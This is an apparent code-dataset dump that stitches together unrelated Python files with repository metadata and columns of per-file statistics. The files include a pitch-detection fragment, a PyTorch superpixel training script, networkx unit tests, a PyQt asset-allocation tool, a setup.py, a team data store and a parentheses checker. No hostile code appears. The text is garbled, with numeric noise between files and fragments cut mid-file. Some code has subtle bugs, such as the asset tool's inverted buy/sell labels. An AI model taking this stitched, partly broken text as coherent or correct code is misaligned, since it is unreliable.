afAmdf[eta] = np.sum(np.abs(x[np.arange(0, K - 1 - eta)] - x[np.arange(eta + 1, K)])) / K
return (afAmdf)
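Editor's sketch: a smoke test on a synthetic 440 Hz tone, assuming the module above is importable; block and hop sizes are illustrative.

import numpy as np
from PitchTimeAmdf import PitchTimeAmdf

f_s = 44100
x = np.sin(2 * np.pi * 440 * np.arange(0, 0.5 * f_s) / f_s)  # half a second
f, t = PitchTimeAmdf(x, 1024, 512, f_s)
print(f[5])  # expected near 440 Hz (441 Hz for the integer lag of 100 samples)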
| 23.161765
| 97
| 0.581587
| 243
| 1,575
| 3.662551
| 0.36214
| 0.013483
| 0.040449
| 0.022472
| 0.07191
| 0.047191
| 0.047191
| 0.047191
| 0
| 0
| 0
| 0.024259
| 0.293333
| 1,575
| 67
| 98
| 23.507463
| 0.775382
| 0.256508
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.068966
| 0
| 0.241379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
31f5cac689f164c99d0da2f1eb8dc6d483e34f4e
| 6,878
|
py
|
Python
|
trainfile/mfeam_shapenet-spix-disc.py
|
aabbcco/ssn-3d-pytorch
|
3b5a1bb807ce751b03501772ed9da48ac7f9f30b
|
[
"MIT"
] | null | null | null |
trainfile/mfeam_shapenet-spix-disc.py
|
aabbcco/ssn-3d-pytorch
|
3b5a1bb807ce751b03501772ed9da48ac7f9f30b
|
[
"MIT"
] | null | null | null |
trainfile/mfeam_shapenet-spix-disc.py
|
aabbcco/ssn-3d-pytorch
|
3b5a1bb807ce751b03501772ed9da48ac7f9f30b
|
[
"MIT"
] | null | null | null |
import os
import math
import numpy as np
import time
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
from tensorboardX import SummaryWriter
import sys
sys.path.append(os.path.dirname("../"))
from lib.utils.meter import Meter
from models.model_MNFEAM import MFEAM_SSN
from lib.dataset.shapenet import shapenet_spix
from lib.utils.loss import reconstruct_loss_with_cross_etnropy, reconstruct_loss_with_mse, uniform_compact_loss
from lib.MEFEAM.MEFEAM import discriminative_loss
@torch.no_grad()
def eval(model, loader, pos_scale, device):
def achievable_segmentation_accuracy(superpixel, label):
"""
Function to calculate Achievable Segmentation Accuracy:
ASA(S,G) = sum_j max_i |s_j \cap g_i| / sum_i |g_i|
Args:
input: superpixel image (H, W),
output: ground-truth (H, W)
"""
TP = 0
unique_id = np.unique(superpixel)
for uid in unique_id:
mask = superpixel == uid
label_hist = np.histogram(label[mask])
maximum_regionsize = label_hist[0].max()
TP += maximum_regionsize
return TP / label.size
model.eval() # change the mode of model to eval
sum_asa = 0
for data in loader:
inputs, labels = data # b*c*npoint
inputs = inputs.to(device)
labels = labels.to(device) # semantic labels
inputs = pos_scale * inputs
# forward pass: returns affinity, hard labels, and the feature tensor
Q, H, feat = model(inputs)
asa = achievable_segmentation_accuracy(
H.to("cpu").detach().numpy(),
labels.to("cpu").numpy()) # return data to cpu
sum_asa += asa
model.train()
return sum_asa / len(loader) # cal asa
def update_param(data, model, optimizer, compactness, pos_scale, device,
disc_loss):
inputs, labels, _, spix = data
inputs = inputs.to(device)
labels = labels.to(device)
inputs = pos_scale * inputs
(Q, H, _, _), msf_feature = model(inputs)
recons_loss = reconstruct_loss_with_cross_etnropy(Q, labels)
compact_loss = reconstruct_loss_with_mse(Q, inputs, H)
disc = disc_loss(msf_feature, spix)
#uniform_compactness = uniform_compact_loss(Q,coords.reshape(*coords.shape[:2], -1), H,device=device)
loss = recons_loss + compactness * compact_loss + disc
optimizer.zero_grad() # clear previous gradients
loss.backward() # compute gradients
optimizer.step() # apply the parameter update
return {
"loss": loss.item(),
"reconstruction": recons_loss.item(),
"compact": compact_loss.item(),
"disc": disc.item()
}
def train(cfg):
if torch.cuda.is_available():
device = "cuda"
else:
device = "cpu"
model = MFEAM_SSN(10, 50).to(device)
disc_loss = discriminative_loss(0.1, 0.5)
optimizer = optim.Adam(model.parameters(), cfg.lr)
train_dataset = shapenet_spix(cfg.root)
train_loader = DataLoader(train_dataset,
cfg.batchsize,
shuffle=True,
drop_last=True,
num_workers=cfg.nworkers)
# test_dataset = shapenet.shapenet(cfg.root, split="test")
# test_loader = DataLoader(test_dataset, 1, shuffle=False, drop_last=False)
meter = Meter()
iterations = 0
max_val_asa = 0
writer = SummaryWriter(log_dir='log', comment='traininglog')
while iterations < cfg.train_iter:
for data in train_loader:
iterations += 1
metric = update_param(data, model, optimizer, cfg.compactness,
cfg.pos_scale, device, disc_loss)
meter.add(metric)
state = meter.state(f"[{iterations}/{cfg.train_iter}]")
print(state)
# return {"loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item()}
writer.add_scalar("comprehensive/loss", metric["loss"], iterations)
writer.add_scalar("loss/reconstruction_loss",
metric["reconstruction"], iterations)
writer.add_scalar("loss/compact_loss", metric["compact"],
iterations)
writer.add_scalar("loss/disc_loss", metric["disc"], iterations)
if (iterations % 1000) == 0:
torch.save(
model.state_dict(),
os.path.join(cfg.out_dir,
"model_iter" + str(iterations) + ".pth"))
# if (iterations % cfg.test_interval) == 0:
# asa = eval(model, test_loader, cfg.pos_scale, device)
# print(f"validation asa {asa}")
# writer.add_scalar("comprehensive/asa", asa, iterations)
# if asa > max_val_asa:
# max_val_asa = asa
# torch.save(model.state_dict(), os.path.join(
            #         cfg.out_dir, "best_model_sp_loss.pth"))
if iterations == cfg.train_iter:
break
unique_id = str(int(time.time()))
torch.save(model.state_dict(),
os.path.join(cfg.out_dir, "model" + unique_id + ".pth"))
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--root",
type=str,
default='../shapenet_partseg_spix',
help="/ path/to/shapenet")
parser.add_argument("--out_dir",
default="./log",
type=str,
help="/path/to/output directory")
parser.add_argument("--batchsize", default=8, type=int)
parser.add_argument("--nworkers",
default=8,
type=int,
help="number of threads for CPU parallel")
parser.add_argument("--lr", default=1e-6, type=float, help="learning rate")
parser.add_argument("--train_iter", default=10000, type=int)
parser.add_argument("--fdim",
default=10,
type=int,
help="embedding dimension")
parser.add_argument("--niter",
default=5,
type=int,
help="number of iterations for differentiable SLIC")
parser.add_argument("--nspix",
default=50,
type=int,
help="number of superpixels")
parser.add_argument("--pos_scale", default=10, type=float)
parser.add_argument("--compactness", default=1e-4, type=float)
parser.add_argument("--test_interval", default=100, type=int)
args = parser.parse_args()
os.makedirs(args.out_dir, exist_ok=True)
train(args)
hexsha: 31f62416b0ccc5186e179c986b3ee82c422d3de0 | size: 5,226 | ext: py | lang: Python
path: venv/Lib/site-packages/networkx/algorithms/tests/test_structuralholes.py | repo: amelliaaas/tugastkc4 @ f442382c72379e911f3780543b95345a3b1c9407 | licenses: ["Apache-2.0"]
stars: 10,024 (2015-01-01 to 2022-03-31) | issues: 3,191 (2015-01-01 to 2022-03-31) | forks: 3,272 (2015-01-01 to 2022-03-31)
"""Unit tests for the :mod:`networkx.algorithms.structuralholes` module."""
import math
import pytest
import networkx as nx
class TestStructuralHoles:
"""Unit tests for computing measures of structural holes.
    The expected values for these functions were originally computed using the
    proprietary software `UCINET`_ and the free software `IGraph`_, and then
    verified by hand to make sure that the results are correct.
.. _UCINET: https://sites.google.com/site/ucinetsoftware/home
.. _IGraph: http://igraph.org/
"""
def setup(self):
self.D = nx.DiGraph()
self.D.add_edges_from([(0, 1), (0, 2), (1, 0), (2, 1)])
self.D_weights = {(0, 1): 2, (0, 2): 2, (1, 0): 1, (2, 1): 1}
# Example from http://www.analytictech.com/connections/v20(1)/holes.htm
self.G = nx.Graph()
self.G.add_edges_from(
[
("A", "B"),
("A", "F"),
("A", "G"),
("A", "E"),
("E", "G"),
("F", "G"),
("B", "G"),
("B", "D"),
("D", "G"),
("G", "C"),
]
)
self.G_weights = {
("A", "B"): 2,
("A", "F"): 3,
("A", "G"): 5,
("A", "E"): 2,
("E", "G"): 8,
("F", "G"): 3,
("B", "G"): 4,
("B", "D"): 1,
("D", "G"): 3,
("G", "C"): 10,
}
def test_constraint_directed(self):
constraint = nx.constraint(self.D)
assert constraint[0] == pytest.approx(1.003, abs=1e-3)
assert constraint[1] == pytest.approx(1.003, abs=1e-3)
assert constraint[2] == pytest.approx(1.389, abs=1e-3)
def test_effective_size_directed(self):
effective_size = nx.effective_size(self.D)
assert effective_size[0] == pytest.approx(1.167, abs=1e-3)
assert effective_size[1] == pytest.approx(1.167, abs=1e-3)
assert effective_size[2] == pytest.approx(1, abs=1e-3)
def test_constraint_weighted_directed(self):
D = self.D.copy()
nx.set_edge_attributes(D, self.D_weights, "weight")
constraint = nx.constraint(D, weight="weight")
assert constraint[0] == pytest.approx(0.840, abs=1e-3)
assert constraint[1] == pytest.approx(1.143, abs=1e-3)
assert constraint[2] == pytest.approx(1.378, abs=1e-3)
def test_effective_size_weighted_directed(self):
D = self.D.copy()
nx.set_edge_attributes(D, self.D_weights, "weight")
effective_size = nx.effective_size(D, weight="weight")
assert effective_size[0] == pytest.approx(1.567, abs=1e-3)
assert effective_size[1] == pytest.approx(1.083, abs=1e-3)
assert effective_size[2] == pytest.approx(1, abs=1e-3)
def test_constraint_undirected(self):
constraint = nx.constraint(self.G)
assert constraint["G"] == pytest.approx(0.400, abs=1e-3)
assert constraint["A"] == pytest.approx(0.595, abs=1e-3)
assert constraint["C"] == pytest.approx(1, abs=1e-3)
def test_effective_size_undirected_borgatti(self):
effective_size = nx.effective_size(self.G)
assert effective_size["G"] == pytest.approx(4.67, abs=1e-2)
assert effective_size["A"] == pytest.approx(2.50, abs=1e-2)
assert effective_size["C"] == pytest.approx(1, abs=1e-2)
def test_effective_size_undirected(self):
G = self.G.copy()
nx.set_edge_attributes(G, 1, "weight")
effective_size = nx.effective_size(G, weight="weight")
assert effective_size["G"] == pytest.approx(4.67, abs=1e-2)
assert effective_size["A"] == pytest.approx(2.50, abs=1e-2)
assert effective_size["C"] == pytest.approx(1, abs=1e-2)
def test_constraint_weighted_undirected(self):
G = self.G.copy()
nx.set_edge_attributes(G, self.G_weights, "weight")
constraint = nx.constraint(G, weight="weight")
assert constraint["G"] == pytest.approx(0.299, abs=1e-3)
assert constraint["A"] == pytest.approx(0.795, abs=1e-3)
assert constraint["C"] == pytest.approx(1, abs=1e-3)
def test_effective_size_weighted_undirected(self):
G = self.G.copy()
nx.set_edge_attributes(G, self.G_weights, "weight")
effective_size = nx.effective_size(G, weight="weight")
assert effective_size["G"] == pytest.approx(5.47, abs=1e-2)
assert effective_size["A"] == pytest.approx(2.47, abs=1e-2)
assert effective_size["C"] == pytest.approx(1, abs=1e-2)
def test_constraint_isolated(self):
G = self.G.copy()
G.add_node(1)
constraint = nx.constraint(G)
assert math.isnan(constraint[1])
def test_effective_size_isolated(self):
G = self.G.copy()
G.add_node(1)
nx.set_edge_attributes(G, self.G_weights, "weight")
effective_size = nx.effective_size(G, weight="weight")
assert math.isnan(effective_size[1])
def test_effective_size_borgatti_isolated(self):
G = self.G.copy()
G.add_node(1)
effective_size = nx.effective_size(G)
assert math.isnan(effective_size[1])
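# Illustrative sketch (not part of the original test suite): on a triangle,
# every node is maximally constrained. Each neighbor share is p_vw = 1/2, so
# Burt's constraint is c(v) = 2 * (1/2 + 1/2 * 1/2) ** 2 = 1.125 for all nodes.
def _constraint_triangle_demo():
    G = nx.complete_graph(3)
    c = nx.constraint(G)
    assert all(v == pytest.approx(1.125, abs=1e-9) for v in c.values())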
hexsha: 31fb74a7001125577af1d8ec0c7f1936437a0db6 | size: 19,069 | ext: py | lang: Python
path: AssetAllocation.py | repo: MomsLasanga/AssetAllocation @ 3729da4f73402d9162c444636002a964f26e40eb | licenses: ["CC0-1.0"]
stars: null | issues: null | forks: null
"""
Asset Allocation
By Patrick Murrell
Created 6/17/2020
This program takes a CSV positions file from fidelity.com for a Roth IRA account that contains the
investments SPAXX, FXNAX, FZILX, and FZROX. Since SPAXX is a money market fund, it is assumed that the money
held in it is not meant to be counted in the total asset allocation of the account.
Once the CSV file is selected, its data is scraped using Python's csv library and used in calculations and
tables that display useful statistics to the user. The user then enters the amount they want to invest and
clicks the "Calculate Investment Strategy" button to generate a table of values and display the recommended
investment strategy on three buttons. These three buttons tell us whether to buy, sell, or hold a dollar
amount of each fund. Clicking a button copies its number value to the clipboard to make buying and selling
stocks easier. This program is written ideally for a single user (my investment strategy), but anyone can
use the code to build their own version if they want.
"""
import csv # for the scraping of the csv file
import re # for making sure we just copy the buttons numbers
from PyQt5.QtWidgets import QFileDialog # to use the file browser in order to select a fidelity issued csv file
from PyQt5 import QtCore, QtWidgets, QtGui # to build the applications GUI
import sys # for starting and exiting the application
# noinspection PyBroadException
class UiMainWindow(object):
# decides whether or not we buy/sell/hold the current allocation of a fund
def buy_or_sell(self, percentage, total, current, money_to_invest, key):
s: str # the string we print onto the buttons
target = total * percentage # our ideal dollar amount invested in the fund
        actual_vs_target_ratio = target / current  # ratio of the ideal target allocation to the current allocation
        # if the fund is within 5% of its target allocation and no new money is
        # being put in or taken out, then we leave the fund as-is
if .95 < actual_vs_target_ratio < 1.05 and int(money_to_invest) == 0:
s = "Looks good for "
else: # buy or sell the exact amount of the fund so we hit the target allocation
amount_to_trade = str(round(abs(current - target), 2))
if actual_vs_target_ratio > 1.0:
s = "Buy "
else:
s = "Sell "
s += "$" + amount_to_trade + " "
self.target_value.append(str(round(target, 2))) # so we can display the target value in the info table
s += self.info_table[1][key] # add the name of the investment to the string
return s # return the text to add to the button
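    # A minimal sketch of the rebalancing rule above (hypothetical numbers added
    # for illustration; this helper is not part of the original app and is never
    # called): with a $1,000 total, a 20% target and $150 currently held, the
    # target is $200, so the recommendation is to buy $50.
    @staticmethod
    def _rebalance_sketch():
        total, percentage, current = 1000.0, 0.20, 150.0
        target = total * percentage  # ideal dollar amount for the fund
        assert round(abs(current - target), 2) == 50.0  # -> "Buy $50.0"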
    # uses the csv module to read the file and add the current balances of the investments to a list
def scrape_values_from_csv(self):
temp_names = [] # temporarily stores labels of funds
temp_balances = [] # temporarily stores current balances of funds
csv_list = [] # list that stores the contents of the csv file
self.current_balances.clear() # clear the list of balances so we can replace them with the current csv values
        try:  # read the exported list from Fidelity using the csv module
with open(self.filename, 'r') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader: # read the csv file contents into a list
csv_list.append(row)
        except Exception:  # if reading fails, notify the user by returning [-1] (a sentinel of sorts)
self.current_balances = [-1] # we check this to report that they did not enter a correct csv file
else:
# reset the info table list and set its values to the headings
self.info_table = [['Symbol', 'Current Value', 'Current Allocation', 'Target value', 'Target Allocation']]
for i in range(2, 5): # read through the csv list
temp_balances.append(csv_list[i][6]) # access the current values
self.current_balances.append(float(temp_balances[i - 2].replace('$', ''))) # remove the '$' sign
temp_names.append(csv_list[i][1]) # add the name of the fund to label names
self.info_table.append(temp_names) # add the names and balances lists to the
self.info_table.append(temp_balances) # info table list
    # takes the values from the csv list and the money we want to invest, and computes the recommended trades
def calculate_strategy(self, money_to_invest):
        # Fixed asset allocation percentages based on the target year in the
        # filename (mine is keyed to each 20XX decade, because I was born in 1999)
if "2020" in self.filename:
bond_percentage = .2
international_index_percentage = .3
national_index_percentage = .5
elif "2030" in self.filename:
bond_percentage = .3
international_index_percentage = .27
national_index_percentage = .43
elif "2040" in self.filename:
bond_percentage = .4
international_index_percentage = .23
national_index_percentage = .37
elif "2050" in self.filename:
bond_percentage = .5
international_index_percentage = .19
national_index_percentage = .31
elif "2060" in self.filename:
bond_percentage = .6
international_index_percentage = .15
national_index_percentage = .25
elif "2070" in self.filename:
bond_percentage = .7
international_index_percentage = .11
national_index_percentage = .19
elif "2080" in self.filename:
bond_percentage = .8
international_index_percentage = .08
national_index_percentage = .12
elif "2090" in self.filename:
bond_percentage = .9
international_index_percentage = .04
national_index_percentage = .06
else:
bond_percentage = 1.0
international_index_percentage = 0.0
national_index_percentage = 0.0
total_amount = money_to_invest + sum(self.current_balances) # total current amount of money to be invested
self.target_value.clear() # clear the target values list
# updates the buttons to display the recommended asset allocation to the user
self.bonds_button.setText(self._translate("main_window", self.buy_or_sell( # set bonds button text
bond_percentage, total_amount, self.current_balances[0], money_to_invest, 0)))
self.international_button.setText(self._translate("main_window", self.buy_or_sell( # set international button
international_index_percentage, total_amount, self.current_balances[1], money_to_invest, 1)))
self.national_button.setText(self._translate("main_window", self.buy_or_sell( # set national button text
national_index_percentage, total_amount, self.current_balances[2], money_to_invest, 2)))
# add current allocation, ideal fund balances, and ideal allocation of account to info table list
self.info_table.append([str(round(100 * self.current_balances[0] / (total_amount - money_to_invest), 2)) + "%",
str(round(100 * self.current_balances[1] / (total_amount - money_to_invest), 2)) + "%",
str(round(100 * self.current_balances[2] / (total_amount - money_to_invest), 2)) + "%"])
self.info_table.append(self.target_value)
self.info_table.append([str(100 * bond_percentage) + "%", str(100 * international_index_percentage) + "%",
str(100 * national_index_percentage) + "%"])
    # this method sets up the ui as well as a couple of variables used across the program
def __init__(self, main_win):
button_stylesheet = "background-color: #3F3F3F; color: #ffffff" # style sheet
self.info_table = [] # table of investment information and positions we print out to the user
self.current_balances = [-1] # current balances tracks the list of fund balances pulled from the csv file
self.numbers = re.compile(r'\d+(?:\.\d+)?') # regular expression that is used to copy the button text numbers
self.target_value = [] # stores the ideal balance values for each fund
self.filename = '' # name path of csv file is stored here
self._translate = QtCore.QCoreApplication.translate # shortened function name for ease of use
# UI related code generated by PyQt file
main_win.setObjectName("main_window")
main_win.resize(780, 350)
main_win.setAutoFillBackground(True)
main_win.setStyleSheet("background-color: #4a4a4a; color: #ffffff; font: 10pt 'Consolas'")
self.central_widget = QtWidgets.QWidget(main_win)
self.central_widget.setAutoFillBackground(True)
self.central_widget.setObjectName("central_widget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.central_widget)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.main_vlayout = QtWidgets.QVBoxLayout()
self.main_vlayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint)
self.main_vlayout.setContentsMargins(5, 5, 5, 5)
self.main_vlayout.setSpacing(5)
self.main_vlayout.setObjectName("main_vlayout")
self.entry_hlayout = QtWidgets.QHBoxLayout()
self.entry_hlayout.setContentsMargins(5, 5, 5, 5)
self.entry_hlayout.setSpacing(5)
self.entry_hlayout.setObjectName("entry_hlayout")
self.entry_label = QtWidgets.QLabel(self.central_widget)
self.entry_label.setObjectName("entry_label")
self.entry_hlayout.addWidget(self.entry_label)
self.entry_lineEdit = QtWidgets.QLineEdit(self.central_widget)
self.entry_lineEdit.setObjectName("entry_lineEdit")
self.entry_hlayout.addWidget(self.entry_lineEdit)
spacer_item = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.entry_hlayout.addItem(spacer_item)
self.main_vlayout.addLayout(self.entry_hlayout)
self.two_button_horizontal = QtWidgets.QHBoxLayout()
self.two_button_horizontal.setContentsMargins(5, 5, 5, 5)
self.two_button_horizontal.setSpacing(5)
self.two_button_horizontal.setObjectName("two_button_horizontal")
self.csv_button = QtWidgets.QPushButton(self.central_widget)
self.csv_button.setObjectName("csv_button")
self.csv_button.setStyleSheet(button_stylesheet)
self.csv_button.clicked.connect(self.open_csv) # when csv button is clicked run the open csv method
self.two_button_horizontal.addWidget(self.csv_button)
self.calculate_button = QtWidgets.QPushButton(self.central_widget)
self.calculate_button.setStyleSheet(button_stylesheet)
self.calculate_button.setObjectName("calculate_button")
self.calculate_button.clicked.connect(self.calculate) # when the calculate button is clicked run calculate()
self.two_button_horizontal.addWidget(self.calculate_button)
self.main_vlayout.addLayout(self.two_button_horizontal)
self.error_vlayout = QtWidgets.QVBoxLayout()
self.error_vlayout.setContentsMargins(5, 5, 5, 5)
self.error_vlayout.setSpacing(5)
self.error_vlayout.setObjectName("error_vlayout")
self.error_label = QtWidgets.QLabel(self.central_widget)
self.error_label.setLayoutDirection(QtCore.Qt.LeftToRight)
self.error_label.setFrameShape(QtWidgets.QFrame.NoFrame)
self.error_label.setFrameShadow(QtWidgets.QFrame.Plain)
self.error_label.setAlignment(QtCore.Qt.AlignCenter)
self.error_label.setObjectName("error_label")
self.info_label = QtWidgets.QLabel(self.central_widget)
self.info_label.setLayoutDirection(QtCore.Qt.LeftToRight)
self.info_label.setFrameShape(QtWidgets.QFrame.NoFrame)
self.info_label.setFrameShadow(QtWidgets.QFrame.Plain)
self.info_label.setAlignment(QtCore.Qt.AlignCenter)
        self.info_label.setObjectName("info_label")
self.error_vlayout.addWidget(self.info_label)
self.error_vlayout.addWidget(self.error_label)
self.main_vlayout.addLayout(self.error_vlayout)
self.three_button_horizontal = QtWidgets.QHBoxLayout()
self.three_button_horizontal.setContentsMargins(5, 5, 5, 5)
self.three_button_horizontal.setSpacing(5)
self.three_button_horizontal.setObjectName("three_button_horizontal")
self.bonds_button = QtWidgets.QPushButton(self.central_widget)
self.bonds_button.setObjectName("bonds_button")
self.bonds_button.setStyleSheet(button_stylesheet)
self.bonds_button.clicked.connect(self.copy_bond_number)
self.three_button_horizontal.addWidget(self.bonds_button)
self.international_button = QtWidgets.QPushButton(self.central_widget)
self.international_button.setObjectName("international_button")
self.international_button.setStyleSheet(button_stylesheet)
self.international_button.clicked.connect(self.copy_international_number)
self.three_button_horizontal.addWidget(self.international_button)
self.national_button = QtWidgets.QPushButton(self.central_widget)
self.national_button.setObjectName("national_button")
self.national_button.setStyleSheet(button_stylesheet)
self.national_button.clicked.connect(self.copy_national_number)
self.three_button_horizontal.addWidget(self.national_button)
self.main_vlayout.addLayout(self.three_button_horizontal)
self.verticalLayout_2.addLayout(self.main_vlayout)
main_win.setCentralWidget(self.central_widget)
self.menubar = QtWidgets.QMenuBar(main_win)
self.menubar.setGeometry(QtCore.QRect(0, 0, 884, 21))
self.menubar.setObjectName("menubar")
main_win.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(main_win)
self.statusbar.setObjectName("statusbar")
main_win.setStatusBar(self.statusbar)
self.reanimate_ui(main_win)
QtCore.QMetaObject.connectSlotsByName(main_win)
# Ui function that sets initial ui text
def reanimate_ui(self, main_w):
main_w.setWindowTitle(self._translate("main_window", "Asset Allocation"))
self.entry_label.setText(self._translate("main_window", "The amount you want to invest:"))
self.csv_button.setText(self._translate("main_window", "Browse For CSV"))
self.calculate_button.setText(self._translate("main_window", "Calculate Investment Strategy"))
self.error_label.setText(self._translate("main_window", ""))
self.info_label.setText(self._translate("main_window", ""))
self.bonds_button.setText(self._translate("main_window", ""))
self.international_button.setText(self._translate("main_window", ""))
self.national_button.setText(self._translate("main_window", ""))
# creates a file explorer dialog to select csv. checks and reports if a valid csv was selected
def open_csv(self):
# open and select file from csv button
filename_list = list(QFileDialog.getOpenFileName(main_window, 'Open file', "/", "csv files (*.csv)"))
self.filename = str(filename_list[0])
self.scrape_values_from_csv()
if self.current_balances == [-1]: # if a csv file is not detected
self.csv_file_error() # report an error to the user
else:
self.error_label.setText(self._translate("main_window", self.filename)) # show the file name to the user
    # check that the user entered either a number or nothing and selected a csv, then run calculate_strategy()
def calculate(self):
try:
amount_to_invest = float(self.entry_lineEdit.text()) # check to see if the user entered a proper number
        except ValueError:
if self.entry_lineEdit.text() == '': # if the user enters nothing assume they are investing $0.00
amount_to_invest = 0.00
else: # since the user did not enter a number throw an error and exit the function
self.error_label.setText(self._translate("main_window", "You did not enter a valid amount"))
return
if self.current_balances != [-1]: # if the user entered a valid csv
self.calculate_strategy(amount_to_invest) # calculate our strategy and fill the rest of the info table list
self.error_label.setText(self._translate("main_window", "Strategy Calculated"))
# print our info table list onto the screen in the form of a table
s = 'Values From CSV: \n\n|' # create the info table in a string called s
for i in range(len(self.info_table[0])):
s += "{:20}|".format((str(self.info_table[0][i]).ljust(15)))
s += "\n" + "-" * int((len(s) * .85))
for i in range(len(self.info_table[1])):
s += "\n|"
for j in range(1, len(self.info_table)):
s += "{:20}|".format((str(self.info_table[j][i]).ljust(15)))
s += '\n'
self.info_label.setText(self._translate("main_window", s)) # set the info label to the info table
            for i in range(3):  # remove the last three columns so repeated calculations do not append duplicates
self.info_table.remove(self.info_table[len(self.info_table) - 1])
else:
self.csv_file_error() # report an error to the user
# methods that copy the text of how much to buy/sell/hold from button onto clipboard
def copy_bond_number(self):
cb.setText(''.join(self.numbers.findall(self.bonds_button.text())), mode=cb.Clipboard)
def copy_national_number(self):
cb.setText(''.join(self.numbers.findall(self.national_button.text())), mode=cb.Clipboard)
def copy_international_number(self):
cb.setText(''.join(self.numbers.findall(self.international_button.text())), mode=cb.Clipboard)
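    # Illustration of the clipboard regex above (added; '52.50' is a hypothetical
    # button label): self.numbers.findall('Buy $52.50 FZROX') returns ['52.50'],
    # so only the dollar figure lands on the clipboard.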
# report an error if a csv file is not detected (when self.current_values == [-1])
def csv_file_error(self):
        self.error_label.setText(self._translate("main_window", "You did not enter a csv file"))
# main function that starts and closes the app
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
main_window = QtWidgets.QMainWindow()
cb = QtWidgets.QApplication.clipboard()
cb.clear(mode=cb.Clipboard)
ui = UiMainWindow(main_window)
main_window.show()
sys.exit(app.exec_())
hexsha: 31fb8c91aed632440a47a6131c0345c5540769ba | size: 919 | ext: py | lang: Python
path: setup.py | repo: matsurih/pyknp @ e4d0756868676a0c2058dbc0d8dfa77102fe0ba4 | licenses: ["BSD-3-Clause"]
stars: null | issues: null | forks: null
#!/usr/bin/env python
__author__ = 'Kurohashi-Kawahara Lab, Kyoto Univ.'
__email__ = 'contact@nlp.ist.i.kyoto-u.ac.jp'
__copyright__ = ''
__license__ = 'See COPYING'
import os
from setuptools import setup, find_packages
about = {}
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'pyknp', '__version__.py')) as f:
    exec(f.read(), about)
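# (added note) exec-ing pyknp/__version__.py fills `about` with that file's
# globals, typically about['__version__'], without importing pyknp itself,
# which avoids importing the package before its dependencies are installed.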
with open('README.md', encoding='utf8') as f:
long_description = f.read()
setup(
name='pyknp',
version=about['__version__'],
maintainer=__author__,
maintainer_email=__email__,
author=__author__,
author_email=__email__,
description='Python module for JUMAN/KNP.',
license=__license__,
url='https://github.com/ku-nlp/pyknp',
long_description=long_description,
long_description_content_type='text/markdown',
scripts=['pyknp/scripts/knp-drawtree', ],
packages=find_packages(),
install_requires=['six'],
)
hexsha: 31fbbf24a86c0801f6f0f2045710204934802521 | size: 1,729 | ext: py | lang: Python
path: src/api/store/export.py | repo: gregory-chekler/api @ 11ecbea945e7eb6fa677a0c0bb32bda51ba15f28 | licenses: ["MIT"]
stars: null | issues: null | forks: null
from database.models import Team, UserProfile
from _main_.utils.massenergize_errors import MassEnergizeAPIError, InvalidResourceError, ServerError, CustomMassenergizeError
from _main_.utils.massenergize_response import MassenergizeResponse
from _main_.utils.context import Context
class TeamStore:
def __init__(self):
self.name = "Team Store/DB"
def get_team_info(self, team_id) -> (dict, MassEnergizeAPIError):
team = Team.objects.filter(id=team_id)
if not team:
return None, InvalidResourceError()
return team, None
def list_teams(self, community_id) -> (list, MassEnergizeAPIError):
teams = Team.objects.filter(community__id=community_id)
if not teams:
return [], None
return teams, None
def create_team(self, args) -> (dict, MassEnergizeAPIError):
try:
new_team = Team.create(**args)
new_team.save()
return new_team, None
except Exception:
return None, ServerError()
def update_team(self, team_id, args) -> (dict, MassEnergizeAPIError):
team = Team.objects.filter(id=team_id)
if not team:
return None, InvalidResourceError()
team.update(**args)
return team, None
  def delete_team(self, team_id) -> (dict, MassEnergizeAPIError):
    teams = Team.objects.filter(id=team_id)
    if not teams:
      return None, InvalidResourceError()
    teams.delete()  # presumably the intended behavior; the original body fell through without deleting
    return None, None
def list_teams_for_community_admin(self, community_id) -> (list, MassEnergizeAPIError):
teams = Team.objects.filter(community__id = community_id)
return teams, None
def list_teams_for_super_admin(self):
try:
teams = Team.objects.all()
return teams, None
except Exception as e:
print(e)
return None, CustomMassenergizeError(str(e))
hexsha: 31fbec348a03e3f7b7667b0fb7f3d122e939f326 | size: 1,125 | ext: py | lang: Python
path: valid_parentheses.py | repo: fossilet/leetcode @ 4cf787c74fc339dc6aee6a0b633ca15b38ac18a1 | licenses: ["MIT"]
stars: 5 (2015-12-10 to 2021-07-02) | issues: null | forks: 1 (2015-10-01 to 2015-10-01)
"""
https://oj.leetcode.com/problems/valid-parentheses/
Given a string containing just the characters '(', ')', '{', '}', '[' and ']', determine if the input string is valid.
The brackets must close in the correct order, "()" and "()[]{}" are all valid but "(]" and "([)]" are not.
"""
class Solution:
# @return a boolean
def isValid(self, s):
        # map each closing bracket to its opener so the match is a single lookup
        pairs = {')': '(', ']': '[', '}': '{'}
        stack = []
        for x in s:
            if x in '({[':
                stack.append(x)
            else:
                try:
                    y = stack.pop()
                except IndexError:
                    return False
                if pairs[x] != y:
                    return False
        return stack == []
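    # Worked trace (added for illustration): for '([)]' the stack grows to
    # ['(', '['], then ')' is compared against the popped '[', a mismatch,
    # so isValid returns False, as asserted below.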
if __name__ == '__main__':
s = Solution()
assert s.isValid('()')
assert s.isValid('[]')
assert not s.isValid('[')
assert not s.isValid('}')
assert not s.isValid('([')
assert s.isValid('([]{})[]')
assert not s.isValid('([)]')
hexsha: 31ffd8fdd3242dbfb70cd647f01afb511ece19be | size: 315 | ext: py | lang: Python
